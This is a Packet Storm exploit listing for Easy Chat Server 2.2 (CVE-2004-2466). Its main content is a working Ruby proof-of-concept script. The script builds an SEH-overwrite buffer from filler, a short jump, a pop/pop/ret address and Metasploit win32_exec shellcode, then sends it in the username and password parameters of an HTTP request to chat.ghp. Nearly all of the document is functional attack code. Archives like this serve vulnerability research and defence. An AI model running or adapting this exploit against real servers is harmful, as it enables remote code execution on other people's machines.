Easy Chat Server 2.2 Buffer Overflow

PACKETSTORM:85363
2010-01-19 00:00:00
John Babio
packetstormsecurity.com

EPSS: 0.193
Percentile: 96.3%

```ruby
#!/usr/bin/ruby

# Title: Exploit EFS Software Easy Chat Server v2.2
# EDB-ID:
# CVE-ID: 2004-2466
# OSVDB-ID: 7416
# Author: John Babio
# Published: 2010-01-17
# Tested on: [Windows XP Sp3 Eng]
# Download Exploit Code
# Download Vulnerable app (https://www.securinfos.info/old_softwares_vulnerable/Easy_Chat_Server_2.2.exe)

require 'net/http'
require 'uri'
require 'socket'

jmp = "\xeb\x06\x90\x90"  # short forward jump plus two NOPs
ppr = "\xa2\xb9\x01\x10"  # SSLEAY32.dll pop ebx, pop ebp, ret (original wrote "\01", the same byte as "\x01")

# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
shellcode = "\x2b\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x86" +
"\x49\xae\x6a\x83\xeb\xfc\xe2\xf4\x7a\xa1\xea\x6a\x86\x49\x25\x2f" +
"\xba\xc2\xd2\x6f\xfe\x48\x41\xe1\xc9\x51\x25\x35\xa6\x48\x45\x23" +
"\x0d\x7d\x25\x6b\x68\x78\x6e\xf3\x2a\xcd\x6e\x1e\x81\x88\x64\x67" +
"\x87\x8b\x45\x9e\xbd\x1d\x8a\x6e\xf3\xac\x25\x35\xa2\x48\x45\x0c" +
"\x0d\x45\xe5\xe1\xd9\x55\xaf\x81\x0d\x55\x25\x6b\x6d\xc0\xf2\x4e" +
"\x82\x8a\x9f\xaa\xe2\xc2\xee\x5a\x03\x89\xd6\x66\x0d\x09\xa2\xe1" +
"\xf6\x55\x03\xe1\xee\x41\x45\x63\x0d\xc9\x1e\x6a\x86\x49\x25\x02" +
"\xba\x16\x9f\x9c\xe6\x1f\x27\x92\x05\x89\xd5\x3a\xee\xb9\x24\x6e" +
"\xd9\x21\x36\x94\x0c\x47\xf9\x95\x61\x2a\xcf\x06\xe5\x49\xae\x6a"

# 216 bytes of filler, then the jump and the pop/pop/ret address, then the payload
buffer = "\x41" * 216 + jmp + ppr + shellcode

# The overlong value is sent in both the username and password parameters of chat.ghp
url = URI.parse('http://10.10.99.12')
res = Net::HTTP.start(url.host, url.port) { |http|
  http.get('/chat.ghp?username=' + buffer + '&password=' + buffer + '&room=1&sex=2')
}
puts res.body
```
